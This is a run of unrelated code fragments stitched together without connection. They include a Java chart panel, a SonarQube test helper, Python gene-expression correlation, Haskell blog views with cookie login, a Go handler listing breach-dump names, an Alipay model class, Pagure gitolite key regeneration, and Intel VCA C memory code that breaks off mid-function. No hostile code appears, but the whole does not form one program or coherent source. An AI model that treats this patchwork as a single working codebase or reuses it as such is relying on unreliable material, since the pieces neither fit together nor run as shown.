series = dataCollection.getSeriesCount(); if (xyMode) { series -= localSeries; } for (int i=0; i<series; i++) { if (xyMode) { XYTimeSeriesCollection xyTimeSeriesDataCollection = (XYTimeSeriesCollection)dataCollection; XYTimeSeries data = xyTimeSeriesDataCollection.getSeries(i); data.clear(); } else { TimeSeriesCollection timeSeriesDataCollection = (TimeSeriesCollection)dataCollection; TimeSeries data = timeSeriesDataCollection.getSeries(i); data.clear(); } } log.info("Cleared data display."); } /** * Sets properties for the data panel. * * @param key the key for the property * @param value the value for the property */ public void setProperty(String key, String value) { super.setProperty(key, value); if (key != null && value != null) { if (key.equals("domainLowerBound")) { domainAxis.setLowerBound(Double.parseDouble(value)); } else if (key.equals("domainUpperBound")) { domainAxis.setUpperBound(Double.parseDouble(value)); } else if (key.equals("rangeLowerBound")) { log.debug("setting range lower bound: "+value); rangeAxis.setLowerBound(Double.parseDouble(value)); } else if (key.equals("rangeUpperBound")) { log.debug("setting range upper bound: "+value); rangeAxis.setUpperBound(Double.parseDouble(value)); } else if (key.equals(DATA_PANEL_PROPERTY_SHOW_LEGEND) && !Boolean.parseBoolean(value)) { setShowLegend(false); } } } /** * Get the name of this data panel. */ public String toString() { return "JFreeChart Data Panel"; } }
package org.sonar.plugins.text.checks;

import java.io.File;
import java.io.IOException;
import java.nio.charset.Charset;
import java.nio.charset.StandardCharsets;
import java.nio.file.Files;
import java.nio.file.Path;
import java.nio.file.Paths;

import org.apache.commons.io.FileUtils;
import org.junit.BeforeClass;
import org.junit.rules.TemporaryFolder;
import org.junit.runner.RunWith;
import org.mockito.runners.MockitoJUnitRunner;
import org.sonar.api.batch.fs.internal.DefaultFileSystem;
import org.sonar.api.batch.fs.internal.TestInputFileBuilder;

@RunWith(MockitoJUnitRunner.class)
public abstract class AbstractCheckTester {

  private static final Path tempfilesLocation = Paths.get("target", "surefire-test-resources");

  @BeforeClass
  public static void init() throws IOException {
    Files.createDirectories(tempfilesLocation);
  }

  @org.junit.Rule
  public TemporaryFolder temporaryFolder = new TemporaryFolder(tempfilesLocation.toFile());

  protected static final String INCORRECT_NUMBER_OF_VIOLATIONS = "Incorrect number of violations";

  protected TextSourceFile parseAndCheck(final File file, final AbstractTextCheck check, final String projectKey) {
    TextSourceFile textSourceFile = new TextSourceFile(new TestInputFileBuilder(".", file.getPath()).build());
    check.validate(textSourceFile, projectKey);
    return textSourceFile;
  }

  protected DefaultFileSystem createFileSystem() throws IOException {
    File workDir = temporaryFolder.getRoot();
    Files.createDirectories(workDir.toPath());

    DefaultFileSystem fs = new DefaultFileSystem(workDir);
    fs.setEncoding(Charset.defaultCharset());
    return fs;
  }

  protected File createTempFile(final String content) throws IOException {
    File f = temporaryFolder.newFile("file.xml");
    FileUtils.write(f, content, StandardCharsets.UTF_8);
    return f;
  }
}
import numpy as np
import pandas as pd
import scipy.stats


def f(df, C):
    """Correlate each gene's rank-sorted, log-scaled expression with C.

    For every row (gene) of df, the values are sorted, log10(x + 1)
    transformed, scaled to [0, 1] by their maximum, and Pearson-correlated
    against the reference curve C.
    """
    geneNames = []
    corrs = []
    pvalues = []
    for geneName, row in df.iterrows():
        myRankedExpr = row.sort_values()
        myRankedExpr = np.log10(myRankedExpr + 1)
        myY = myRankedExpr / max(myRankedExpr)
        corr, pvalue = scipy.stats.pearsonr(myY, C)
        geneNames.append(geneName)
        corrs.append(corr)
        pvalues.append(pvalue)
    df_corrs = pd.DataFrame({"geneName": geneNames,
                             "corr": corrs,
                             "pvalue": pvalues})
    return df_corrs
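# A minimal usage sketch for f() above, assuming the DataFrame is laid out as
# genes x samples and that C is a reference curve with one value per sample.
# The toy data, gene names, and seed below are illustrative assumptions, not
# part of the original code.
import numpy as np
import pandas as pd

rng = np.random.default_rng(0)
df = pd.DataFrame(rng.poisson(10, size=(3, 5)),
                  index=["geneA", "geneB", "geneC"])
C = np.linspace(0.0, 1.0, 5)   # must have the same length as one row of df

df_corrs = f(df, C)
print(df_corrs)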
/* hc_convert_to_short -- Convert a set of skiplists to a simple linked list. */

static void hc_convert_to_short (HistoryCache_t *hcp)
{
	Skiplist_t	*handles = hcp->hc_handles;

	sl_free (hcp->hc_hashes);
	hcp->hc_inst_head = hcp->hc_inst_tail = NULL;
	sl_walk (handles, hc_cvt_fct, hcp);
	sl_free (handles);
	hcp->hc_skiplists = 0;
}
use musicode::IntervalSet;

#[test]
fn test_simple() {
    let mut set: IntervalSet = IntervalSet::new();
    assert_eq!(set.insert(5), (0, true));
    assert_eq!(set.insert(3), (0, true));
    assert_eq!(set.insert(4), (1, true));
    assert_eq!(set.insert(4), (1, false));
    assert_eq!(set.find_or_insert(4), Ok(1));
    assert_eq!(set.len(), 3);
    assert_eq!(set.binary_search(&3), Ok(0));
}
def split(self, jobs=None):
    """Split the top range into `jobs` pieces and yield the first piece
    while the remaining sub-range is active via self.pushed()."""
    if jobs is None:
        jobs = self.top.size
    (next_piece, sub) = self.top.split(jobs)
    with self.pushed(sub):
        yield next_piece
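# A self-contained sketch of the collaborators split() relies on: a `top`
# object with .size and .split(), and pushed() as a context manager. Every
# name and behavior here is an assumption made to illustrate the control
# flow; the real class is not shown in this snippet.
from contextlib import contextmanager

class Range:
    def __init__(self, lo, hi):
        self.lo, self.hi = lo, hi

    @property
    def size(self):
        return self.hi - self.lo

    def split(self, jobs):
        # Carve off roughly 1/jobs of the range; return (piece, remainder).
        mid = self.lo + max(1, self.size // jobs)
        return Range(self.lo, mid), Range(mid, self.hi)

class Runner:
    def __init__(self, whole):
        self.top = whole
        self._stack = [whole]

    @contextmanager
    def pushed(self, sub):
        # Make `sub` the current top range for the duration of the block.
        self._stack.append(sub)
        self.top = sub
        try:
            yield
        finally:
            self._stack.pop()
            self.top = self._stack[-1]

    def split(self, jobs=None):
        if jobs is None:
            jobs = self.top.size
        next_piece, sub = self.top.split(jobs)
        with self.pushed(sub):
            yield next_piece

r = Runner(Range(0, 10))
for piece in r.split(jobs=2):
    print(piece.lo, piece.hi)   # first half, while the rest is "pushed"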
def git_init_and_tag():
    """Initialize a git repository on first run and tag it 0.0.0."""
    directory_status = invoke_shell("git status", expected_error=True,
                                    print_output=False)
    if 'fatal' in directory_status:
        # Not yet a git repository: create one and make the initial commit.
        invoke_shell("git init")
        invoke_shell("git add .")
        invoke_shell(
            "git commit -m \"Initial commit after CMS Cookiecutter creation, version {}\"".format(
                '{{ cookiecutter._cms_cc_version }}'))
        version = invoke_shell("git tag", expected_error=True)
        if not version:
            invoke_shell("git tag 0.0.0")
    else:
        print("\ngit repository detected. CookieCutter files have been created in {{ cookiecutter.repo_name }} directory.")
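# invoke_shell() is not defined in this snippet. A minimal sketch of what it
# might look like, assuming it runs a shell command and returns the combined
# stdout/stderr as a string; the real helper in this codebase may differ.
import subprocess

def invoke_shell(command, expected_error=False, print_output=True):
    result = subprocess.run(command, shell=True, capture_output=True, text=True)
    output = result.stdout + result.stderr
    if print_output and output:
        print(output)
    # When the caller anticipates failure (e.g. `git status` outside a repo),
    # return the output instead of raising so it can be inspected.
    if result.returncode != 0 and not expected_error:
        raise RuntimeError("command failed: {}\n{}".format(command, output))
    return output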
/** Get locations for all outputs with automatic_location
 *
 * @param program           Program object
 * @param program_interface Interface of program
 **/
void TextureTestBase::prepareFragmentDataLoc(Utils::Program& program, Utils::ProgramInterface& program_interface)
{
	Utils::ShaderInterface&		si		= program_interface.GetShaderInterface(Utils::Shader::FRAGMENT);
	Utils::Variable::PtrVector& outputs = si.m_outputs;

	for (Utils::Variable::PtrVector::iterator it = outputs.begin(); outputs.end() != it; ++it)
	{
		/* Only query outputs whose location is assigned automatically. */
		if (Utils::Variable::m_automatic_location == (*it)->m_descriptor.m_expected_location)
		{
			GLuint index	= program.GetResourceIndex((*it)->m_descriptor.m_name, GL_PROGRAM_OUTPUT);
			GLint  location = 0;

			program.GetResource(GL_PROGRAM_OUTPUT, index, GL_LOCATION, 1 /* size */, &location);

			(*it)->m_descriptor.m_expected_location = location;
		}
	}
}
{-# OPTIONS_GHC -fglasgow-exts -fcontext-stack=30 #-} module Blog.Views where -- View functions and logic. The actual HTML is found in Templates, -- which has pure functions that generally return Html. import Blog.DB (connect) import Blog.Feeds import Blog.Formats (Format(..), getFormatter) import Blog.Forms import Blog.Globals (mkCsrfField) import Blog.Links import Blog.Model import Blog.Templates import Ella.Framework (default404, View) import Ella.GenUtils (utf8, with, exactParse, getTimestamp) import Ella.Param (captureOrDefault, capture) import Ella.Request import Ella.Response import Ella.Utils (addHtml) import Maybe (fromMaybe, isJust, fromJust, catMaybes) import Network.CGI.Protocol (formEncode, urlEncode) import System.Time (ClockTime(..), toUTCTime) import Text.Atom.Feed (Feed) import Text.Atom.Feed.Export (xmlFeed) import Text.StringTemplate import Text.StringTemplate.GenericStandard import Text.XML.Light (showTopElement) import qualified Blog.Category as Ct import qualified Blog.Links as Links import qualified Blog.Post as P import qualified Blog.Settings as Settings import qualified Data.Map as Map import qualified Data.ByteString.Lazy.Char8 as LB import qualified Data.Text.Lazy as LT import qualified Data.Text.Lazy.Encoding as LT import qualified Text.XHtml as X ---- Utilities -- | Generate a standard response, given the HTML to add. standardResponse html = buildResponse [ addHtml html ] utf8HtmlResponse standardResponseBS :: LB.ByteString -> Response standardResponseBS content = buildResponse [ addContent content ] utf8HtmlResponse -- | Standard response, taking a Request and StringTemplate Text as input standardResponseTT :: Request -> StringTemplate LB.ByteString -> Response standardResponseTT req template = let csrffield = mkCsrfField req t2 = setAttribute "csrffield" csrffield template qs = formEncode (allGET req) t3 = setAttribute "currentpath" (urlEncode (Settings.root_url ++ pathInfo req ++ (if not $ null qs then "?" ++ qs else ""))) t2 t4 = setAttribute "allpostsfeedurl" allPostsFeedUrl t3 rendered = render t4 in buildResponse [ addContent rendered ] utf8HtmlResponse -- | Custom 404 response return404 :: View return404 req = do t <- get_template "notfound" return $ Just $ with (standardResponseTT req t) [ setStatus 404 ] return403 :: View return403 req = do t <- get_template "forbidden" return $ Just $ with (standardResponseTT req t) [ setStatus 403 ] -- Feed utilities feedResponse :: Feed -> IO (Maybe Response) feedResponse feed = return $ Just $ with (textBasedResponse "application/atom+xml" "UTF-8") [ addContent $ utf8 $ showTopElement $ xmlFeed feed ] ---- Views -- View for the main page mainIndex :: View mainIndex req = do let curpage = getPage req cn <- connect (posts,more) <- getRecentPosts cn curpage Settings.post_page_size cats <- getCategoriesBulk cn posts t <- get_template "index" return $ Just $ standardResponseTT req $ (renderf t ("posts", map postTemplateInfo posts) ("categories", map (map categoryTemplateInfo) cats) ("paginglinks", pagingLinks indexUrl curpage more) ) -- Feed for all posts allPostsFeedView req = do cn <- connect (posts, more) <- getRecentPosts cn 1 Settings.feed_post_page_size feedResponse $ allPostsFeed posts allCommentsView req = do let curpage = getPage req cn <- connect (commentsAndPosts,more) <- getRecentComments cn curpage Settings.comment_page_size t <- get_template "comments" return $ Just $ standardResponseTT req $ (renderf t ("comments", map (commentTemplateInfo . 
fst) commentsAndPosts) ("urls", map (uncurry commentUrl) commentsAndPosts) ("titles", map (P.title . snd) commentsAndPosts) ("paginglinks", pagingLinks allCommentsUrl curpage more) ("atomfeedurl", allCommentsFeedUrl) ("atomfeedtitle", "All comments in this blog") ) allCommentsFeedView req = do cn <- connect (commentsAndPosts,more) <- getRecentComments cn 1 Settings.feed_comment_page_size feedResponse $ allCommentsFeed commentsAndPosts -- | View to help with debugging debug :: String -> View debug path req = return $ Just $ buildResponse [ addContent $ utf8 "Path:\n" , addContent $ utf8 path , addContent $ utf8 "\n\nRequest:\n" , addContent $ utf8 $ show req ] utf8TextResponse -- | View that performs redirect to main page postsRedirectView :: View postsRedirectView req = return $ Just $ redirectResponse indexUrl -- | View that shows an overview of categories categoriesView :: View categoriesView req = do cn <- connect cats <- getCategories cn t <- get_template "categories" let categories = [ (c, categoryUrl c) | c <- cats ] return $ Just $ standardResponseTT req $ (renderf t ("categories", categories) ("hasCategories", not $ null cats) ) -- | View that shows posts for an individual category categoryView :: String -> View categoryView slug req = do let curpage = getPage req cn <- connect mcat <- getCategoryBySlug cn slug case mcat of Nothing -> return404 req Just cat -> do (posts,more) <- getPostsForCategory cn cat (getPage req) Settings.post_page_size cats <- getCategoriesBulk cn posts t <- get_template "category" return $ Just $ standardResponseTT req $ (renderf t ("category", cat) ("posts", map postTemplateInfo posts) ("categories", map (map categoryTemplateInfo) cats) ("paginglinks", pagingLinks (categoryUrl cat) curpage more) ("atomfeedurl", categoryPostsFeedUrl cat) ("atomfeedtitle", LB.pack "All posts in category " `LB.append` Ct.name cat) ) categoryPostsFeedView slug req = do cn <- connect mcat <- getCategoryBySlug cn slug case mcat of Nothing -> return404 req Just cat -> do (posts,more) <- getPostsForCategory cn cat 1 Settings.feed_post_page_size feedResponse $ categoryPostsFeed cat posts -- | View that shows individual post postView :: String -> View postView slug req = do cn <- connect mp <- getPostBySlug cn slug case mp of Nothing -> return404 req Just post -> do (commentStage, commentData, commentErrors, commentExtra) <- handleUserComment cn post req cats <- getCategoriesForPost cn post comments <- getCommentsForPost cn post related <- getRelatedPosts cn post cats t <- get_template "post" return $ Just $ standardResponseTT req $ (renderf t ("post", postTemplateInfo post) ("commentPreview", commentStage == CommentPreview) ("commentAccepted", commentStage == CommentAccepted) ("commentInvalid", commentStage == CommentInvalid) ("newComment", commentTemplateInfo commentData) ("commentErrors", commentErrors) ("categories", map categoryTemplateInfo cats) ("comments", map commentTemplateInfo comments) ("hasComments", not $ null comments) ("related", map postTemplateInfo related) ("hasRelated", not $ null related) ("commentData", commentData) ("formatWidget", X.toHtml $ formatWidgetForComment commentData) ("commentExtra", commentExtra) ("atomfeedurl", postCommentFeedUrl post) ("atomfeedtitle", "All comments on this post") ("editpageurl", adminEditPostUrl post) ) where handleUserComment cn post req = case requestMethod req of "POST" -> do creds <- getCredentials req (commentData, commentErrors, commentExtra) <- validateComment cn creds (getPOST req) post if null commentErrors then if 
isJust (getPOST req "submit") then do addComment cn commentData return (CommentAccepted, emptyComment, [], commentExtra) -- Just assume 'preview' if not 'submit' else return (CommentPreview, commentData, commentErrors, commentExtra) else return (CommentInvalid, commentData, commentErrors, commentExtra) _ -> do commentExtra <- initialCommentExtra req return (NoComment, emptyComment, [], commentExtra) postCommentFeedView slug req = do cn <- connect mp <- getPostBySlug cn slug case mp of Nothing -> return404 req Just post -> do comments <- getCommentsForPost cn post feedResponse $ postCommentFeed comments post -- | View that displays a login form and handles logging in loginView :: View loginView req = do cn <- connect loginView' cn req -- | Testable version of loginView loginView' cn req = case requestMethod req of "POST" -> do (loginData, loginErrors) <- validateLogin (getPOST req) cn if null loginErrors then do ts <- getTimestamp let loginCookies = createLoginCookies loginData ts let redirectUrl = getGET req "r" `captureOrDefault` adminMenuUrl return $ Just $ (redirectResponse redirectUrl) `with` (map addCookie loginCookies) else do t <- loginTemplate return $ Just $ standardResponseTT req $ loginPage t loginData loginErrors _ -> do t <- loginTemplate return $ Just $ standardResponseTT req $ loginPage t emptyLoginData ([] :: [(String,String)]) where loginPage t loginData loginErrors = (renderf t ("loginInvalid", not $ null loginErrors) ("loginErrors", loginErrors) ("loginData", loginData) ) loginTemplate = get_template "login" -- | Delete auth cookies and redirect. logoutView req = let redirectUrl = getGET req "r" `captureOrDefault` indexUrl in return $ Just $ deleteCookie "username" $ redirectResponse redirectUrl -- -- Admin views -- -- Category editing is very simple and doesn't require -- much validation. 
adminMenu :: View adminMenu req = do t <- get_template "admin_menu" return $ Just $ standardResponseTT req $ (renderf t ("pagetitle", "Blog admin - menu") ("adminNewPostUrl", Links.adminNewPostUrl) ("adminPostsUrl", Links.adminPostsUrl) ("adminCategoriesUrl", Links.adminCategoriesUrl) ) adminPosts req = do t <- get_template "admin_posts" let curpage = getPage req cn <- connect (posts,more) <- getRecentPosts cn curpage Settings.admin_post_page_size return $ Just $ standardResponseTT req $ (renderf t ("pagetitle", "Edit posts") ("posts", map postTemplateInfo posts) ("paginglinks", pagingLinks Links.adminPostsUrl curpage more) ) -- | View that handles all editing of categories (add/edit/delete) adminCategories req = do cn <- connect t <- get_template "admin_categories" -- handle deletion if "delete" in POST vars -- handle adding/editing if "save" in POST vars message <- handlePost req cn categories <- getCategories cn return $ Just $ standardResponseTT req $ (renderf t ("categories", categories) ("message", message) ("showMessage", length message > 0) ) where handlePost req cn = if requestMethod req == "POST" then if isJust (getPOST req "save") then let catid = (getPOST req "catid") `captureOrDefault` 0 :: Int in if catid == 0 then do let ct = Ct.newCategory (getPOST req "name" `captureOrDefault` "") addCategory cn ct return "Category added" else do Just ct <- getCategoryById cn catid let ct2 = ct { Ct.name = utf8 (getPOST req "name" `captureOrDefault` "") } updateCategory cn ct2 return ("Category " ++ show catid ++ " saved") else if isJust (getPOST req "delete") then let catid = (getPOST req "categories") `captureOrDefault` 0 :: Int in do deleteCategory cn catid return ("Category " ++ show catid ++ " deleted") else return "" else return "" -- | View that handles editing an existing blog post adminEditPost post_id req = do cn <- connect m_post <- getPostById cn post_id case m_post of Just p -> adminEditPost' p False cn req Nothing -> return404 req -- | View that handles adding a new blog post adminNewPost req = do cn <- connect adminEditPost' emptyPost True cn req adminEditPost' post isNew cn req = do categories <- getCategories cn postCategories <- if isNew then return [] else getCategoriesForPost cn post case requestMethod req of "GET" -> output post (map Ct.uid postCategories) categories "start" [] "POST" -> do let mode = head $ map fst $ filter snd $ [ ("submit", hasPOST req "submit") , ("delete", hasPOST req "delete") -- use preview as default, for simplicity , ("preview", True) ] if mode == "delete" then do deletePost cn (P.uid post) return $ Just $ redirectResponse adminMenuUrl else do (postData, postCatIds, postErrors) <- validatePost req post if null postErrors then if mode == "submit" then do if isNew then do -- Set timestamp here, because we don't want to do it in -- validatePost (we would need to pass in isNew) ts <- getTimestamp let newPost = postData { P.timestamp = ts } addPost cn newPost postCatIds else updatePost cn postData postCatIds return $ Just $ redirectResponse adminMenuUrl else do -- mode == "preview" output postData postCatIds categories mode postErrors else -- invalid output postData postCatIds categories "invalid" postErrors where output :: P.Post -> [Int] -> [Ct.Category] -> String -> [(String, String)] -> IO (Maybe Response) output postData postCatIds categories mode errors = do t <- get_template "admin_post" return $ Just $ standardResponseTT req $ (renderf t ("post", postData) ("categoriesWidget", X.toHtml $ categoriesWidgetForPost postCatIds categories) 
("formatWidget", X.toHtml $ formatWidgetForPost postData) ("isNew", isNew) ("pagetitle", if isNew then "Add post" else "Edit post") ("mode", mode) ("errors", errors) ("showErrors", not $ null errors) ("showPreview", mode == "preview") ) -- Admin AJAX -- TODO - proper JSON objects simpleMessage msg = buildResponse [ addContent $ utf8 msg ] utf8TextResponse success = simpleMessage "success" failure = simpleMessage "failure" adminCommentVisible req = do let visible = getPOST req "visible" `captureOrDefault` False withValidComment req (\cn commentId -> setCommentVisible cn commentId visible) adminCommentResponse req = do let response = getPOST req "response" `captureOrDefault` "" :: String let formattedResponse = getFormatter Plaintext $ response withValidComment req (\cn commentId -> setCommentResponse cn commentId formattedResponse) return $ Just $ simpleMessage formattedResponse -- TODO - proper error handling adminCommentDelete req = do withValidComment req deleteComment -- Utility that pulls out common functionality of adminComment* withValidComment req action = do let commentId = getPOST req "id" `captureOrDefault` 0 :: Int if commentId <= 0 then return $ Just $ failure else do cn <- connect action cn commentId return $ Just success addSpamWordView = withSpamWord addSpamWord deleteSpamWordView = withSpamWord deleteSpamWord withSpamWord action req = do let word = getPOST req "word" `captureOrDefault` "" if null word then return $ Just $ failure else do cn <- connect action cn word return $ Just success -- Authentication createLoginCookies loginData timestamp = let username = fromJust $ Map.lookup "username" loginData expires = Just $ toUTCTime $ TOD (toInteger timestamp + Settings.login_session_length) 0 in [ standardCookie { cookieName = "username" , cookieValue = username , cookieExpires = expires } ] timeout = 3600 * 24 * 10 -- 10 days type Credentials = Maybe String -- | Return the username if logged in, otherwise Nothing -- -- Relies on secure cookies middleware getCredentials :: Request -> IO Credentials getCredentials req = do return $ getCookieVal req "username" -- Decorators -- | Decorate a view function with this to limit the view -- to users who are 'admins' adminRequired :: View -> View adminRequired view = \req -> do creds <- getCredentials req case creds of Just n -> if n `elem` Settings.admin_usernames then view req else return403 req Nothing -> return403 req -- Utilities getPage req = (getGET req "p") `captureOrDefault` 1 :: Int
// ListBreaches returns a JSON response of all the breaches in the database.
func ListBreaches(w http.ResponseWriter, r *http.Request) {
	mysess := mdb.Copy()
	defer mysess.Close() // release the copied session when the handler returns
	c := mysess.DB("steamer").C("dumps")

	var results []string
	err := c.Find(nil).Distinct("breach", &results)
	if err != nil {
		fmt.Fprintf(os.Stderr, "breach search error: %v", err)
		http.Error(w, "Error searching breaches", http.StatusInternalServerError)
		return
	}

	// Avoid shadowing the json package, and write the bytes directly rather
	// than passing response data through a Fprintf format string.
	data, err := json.Marshal(results)
	if err != nil {
		fmt.Fprintf(os.Stderr, "json encoding error: %v", err)
		http.Error(w, "Error json encoding", http.StatusInternalServerError)
		return
	}

	w.Write(data)
}
#!/usr/bin/env python
# -*- coding: utf-8 -*-
import json

from alipay.aop.api.constant.ParamConstants import *
from alipay.aop.api.domain.IoTBPaaSKeyValue import IoTBPaaSKeyValue


class IoTBPaaSMerchantOrderItemInfo(object):

    def __init__(self):
        self._attrs = None
        self._item_name = None
        self._item_num = None
        self._item_price = None
        self._specs = None

    @property
    def attrs(self):
        return self._attrs

    @attrs.setter
    def attrs(self, value):
        if isinstance(value, list):
            self._attrs = list()
            for i in value:
                if isinstance(i, IoTBPaaSKeyValue):
                    self._attrs.append(i)
                else:
                    self._attrs.append(IoTBPaaSKeyValue.from_alipay_dict(i))

    @property
    def item_name(self):
        return self._item_name

    @item_name.setter
    def item_name(self, value):
        self._item_name = value

    @property
    def item_num(self):
        return self._item_num

    @item_num.setter
    def item_num(self, value):
        self._item_num = value

    @property
    def item_price(self):
        return self._item_price

    @item_price.setter
    def item_price(self, value):
        self._item_price = value

    @property
    def specs(self):
        return self._specs

    @specs.setter
    def specs(self, value):
        if isinstance(value, list):
            self._specs = list()
            for i in value:
                if isinstance(i, IoTBPaaSKeyValue):
                    self._specs.append(i)
                else:
                    self._specs.append(IoTBPaaSKeyValue.from_alipay_dict(i))

    def to_alipay_dict(self):
        params = dict()
        if self.attrs:
            if isinstance(self.attrs, list):
                for i in range(0, len(self.attrs)):
                    element = self.attrs[i]
                    if hasattr(element, 'to_alipay_dict'):
                        self.attrs[i] = element.to_alipay_dict()
            if hasattr(self.attrs, 'to_alipay_dict'):
                params['attrs'] = self.attrs.to_alipay_dict()
            else:
                params['attrs'] = self.attrs
        if self.item_name:
            if hasattr(self.item_name, 'to_alipay_dict'):
                params['item_name'] = self.item_name.to_alipay_dict()
            else:
                params['item_name'] = self.item_name
        if self.item_num:
            if hasattr(self.item_num, 'to_alipay_dict'):
                params['item_num'] = self.item_num.to_alipay_dict()
            else:
                params['item_num'] = self.item_num
        if self.item_price:
            if hasattr(self.item_price, 'to_alipay_dict'):
                params['item_price'] = self.item_price.to_alipay_dict()
            else:
                params['item_price'] = self.item_price
        if self.specs:
            if isinstance(self.specs, list):
                for i in range(0, len(self.specs)):
                    element = self.specs[i]
                    if hasattr(element, 'to_alipay_dict'):
                        self.specs[i] = element.to_alipay_dict()
            if hasattr(self.specs, 'to_alipay_dict'):
                params['specs'] = self.specs.to_alipay_dict()
            else:
                params['specs'] = self.specs
        return params

    @staticmethod
    def from_alipay_dict(d):
        if not d:
            return None
        o = IoTBPaaSMerchantOrderItemInfo()
        if 'attrs' in d:
            o.attrs = d['attrs']
        if 'item_name' in d:
            o.item_name = d['item_name']
        if 'item_num' in d:
            o.item_num = d['item_num']
        if 'item_price' in d:
            o.item_price = d['item_price']
        if 'specs' in d:
            o.specs = d['specs']
        return o
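# A hypothetical round trip through the converters above. The field layout
# for an IoTBPaaSKeyValue dict ("key"/"value") and the sample values are
# assumptions; consult the real IoTBPaaSKeyValue definition for its fields.
raw = {
    "item_name": "espresso",
    "item_num": 2,
    "item_price": 350,
    "attrs": [{"key": "size", "value": "small"}],
}
item = IoTBPaaSMerchantOrderItemInfo.from_alipay_dict(raw)
print(item.item_name, item.item_num)   # "espresso" 2
print(item.to_alipay_dict())           # back to a plain dict for the API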
def generate_user_key_files():
    """Regenerate the gitolite SSH key files for every known user, then
    rebuild the gitolite ACLs."""
    gitolite_home = pagure_config.get("GITOLITE_HOME", None)
    if gitolite_home:
        users = pagure.lib.query.search_user(flask.g.session)
        for user in users:
            pagure.lib.query.update_user_ssh(
                flask.g.session,
                user,
                None,
                pagure_config.get("GITOLITE_KEYDIR", None),
                update_only=True,
            )
    pagure.lib.git.generate_gitolite_acls(project=None)
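# The function above reads two configuration keys. A sketch of the relevant
# settings; the paths shown are placeholder assumptions, and in a real
# deployment these values come from the Pagure configuration file.
pagure_config = {
    "GITOLITE_HOME": "/var/lib/gitolite",
    "GITOLITE_KEYDIR": "/var/lib/gitolite/keydir",
}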
/*
 * Copyright 2019 Intel(R) Corporation (http://www.intel.com)
 *
 * Licensed under the Apache License, Version 2.0 (the "License");
 * you may not use this file except in compliance with the License.
 * You may obtain a copy of the License at http://www.apache.org/licenses/LICENSE-2.0
 * Unless required by applicable law or agreed to in writing, software
 * distributed under the License is distributed on an "AS IS" BASIS,
 * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
 * See the License for the specific language governing permissions and
 * limitations under the License.
 *
 */

#include <stdio.h>
#include <stdlib.h>
#include <stdint.h>
#include <string.h>
#include <inttypes.h>
#include <sys/types.h>
#include <sys/queue.h>
#include <sys/time.h>
#include <sys/mman.h>
#include <stdarg.h>
#include <errno.h>
#include <getopt.h>
#include <signal.h>
#include <stdbool.h>
#include <fcntl.h>
#include <unistd.h>
#include <sys/ioctl.h>
#include <net/if.h>
#include <netinet/in.h>
#include <assert.h>
#include <arpa/inet.h>
#include <malloc.h>
#include <sys/param.h>
#include <ctype.h>
#include <zmq.h>

#include "vca_mem.h"

#ifdef ENCLAVE
void __assert_fail(const char * assertion, const char * file, unsigned int line, const char * function)
{
}
#endif

#ifndef ENCLAVE
#define ZMQ_SEND ((int (*) (void *, void *, size_t, int)) zmq_send)
#define ZMQ_RECV zmq_recv //((int (*) (void *, void *, size_t, int)) zmq_recv)

const char *host_vca_ip_array[2][VCA_SOCKETS] = {
	{ //Host side IPs
		"172.31.1.254", "172.31.2.254", "172.31.3.254",
		"172.31.4.254", "172.31.5.254", "172.31.6.254"
	},
	{ //VCA side IPs
		"172.31.1.1", "172.31.2.1", "172.31.3.1",
		"172.31.4.1", "172.31.5.1", "172.31.6.1"
	}
};

void *context = NULL;
void *c = NULL;

int get_entry(PagemapEntry *entry, int pagemap_fd, uintptr_t vaddr)
{
	size_t nread;
	ssize_t ret;
	uint64_t data;

	nread = 0;
	while (nread < sizeof(data)) {
		ret = pread(pagemap_fd, &data, sizeof(data),
			    (vaddr / sysconf(_SC_PAGE_SIZE)) * sizeof(data) + nread);
		if (ret <= 0) {
			return 1;
		}
		nread += ret;
	}
	entry->pfn = data & (((uint64_t)1 << 54) - 1);
	entry->soft_dirty = (data >> 54) & 1;
	entry->file_page = (data >> 61) & 1;
	entry->swapped = (data >> 62) & 1;
	entry->present = (data >> 63) & 1;
	return 0;
}

unsigned long virt_to_phys_user(uintptr_t vaddr)
{
	char pagemap_file[BUFSIZ];
	int pagemap_fd;
	pid_t pid = getpid();

	snprintf(pagemap_file, sizeof(pagemap_file), "/proc/%ju/pagemap", (uintmax_t)pid);
	pagemap_fd = open(pagemap_file, O_RDONLY);
	if (pagemap_fd < 0) {
		return -1;
	}
	PagemapEntry entry;
	if (get_entry(&entry, pagemap_fd, vaddr)) {
		close(pagemap_fd);
		return -1;
	}
	close(pagemap_fd);
	//printf("pa base 0x%lx vaddr % 4096 ix 0x%lx\n",entry.pfn * sysconf(_SC_PAGE_SIZE),(vaddr % sysconf(_SC_PAGE_SIZE)));
	return ((unsigned long)((entry.pfn * sysconf(_SC_PAGE_SIZE)) + (vaddr % sysconf(_SC_PAGE_SIZE))));
}

void* get_contiguous__2MB(void)
{
	int offset;
	unsigned long phys = 0, base_phys = 0;
	void *vaddr;

	vaddr = memalign(_2MB, _2MB);
	assert(vaddr != NULL);
	assert(madvise(vaddr, _2MB, MADV_HUGEPAGE) == 0);
	assert(mlock(vaddr, _2MB) == 0);
	base_phys = virt_to_phys_user((unsigned long)vaddr);
	for (offset = 0; offset < _2MB; offset += PAGE_SIZE) {
		phys = virt_to_phys_user((unsigned long)vaddr + offset);
		if (phys != (base_phys + offset)) {
			free(vaddr);
			return NULL;
		}
	}
	memset((void *)vaddr, 0x00, REMOTE_RING_SIZE);
	return vaddr;
}

void * get_contiguous__4KB(void)
{
	void * vaddr = NULL;

	vaddr = memalign(PAGE_SIZE, PAGE_SIZE);
	assert(vaddr != NULL);
	assert(mlock(vaddr, PAGE_SIZE) == 0);
	memset(vaddr, 0x00, PAGE_SIZE);
	return vaddr;
}

int get_local_platform_type(void)
{
	return system("lsmod | grep 'vca_mgr ' > /dev/null");
}

// TODO: assumes single digit number of CPUs (max 3 SGX cards)
int get_card_self_socket_number(void)
{
	char hostname[256];
	int hn_len = 0;
	int card_cpu = 0, card_id = 0;

	hostname[255] = '\0';
	gethostname(hostname, 255);
	hn_len = strnlen(hostname, 256);
	card_cpu = isdigit(hostname[hn_len-1]) ? hostname[hn_len-1] - '0' : 0;
	card_id = isdigit(hostname[hn_len-2]) ? hostname[hn_len-2] - '0' : 0;
	// return(((card_cpu/10)*3) + (card_cpu%10));
	return card_id * 3 + card_cpu; //Card socket can only see 1 host socket so /tmp/pipe_0 will always be used
}

void execute(const char *fmt, ...)
{
	char command[MAX_COMMAND_LEN] = {0,};
	va_list args;

	va_start(args, fmt);
	vsnprintf(command, MAX_COMMAND_LEN, fmt, args);
	va_end(args);
	//printf("Executing %s\n",command);
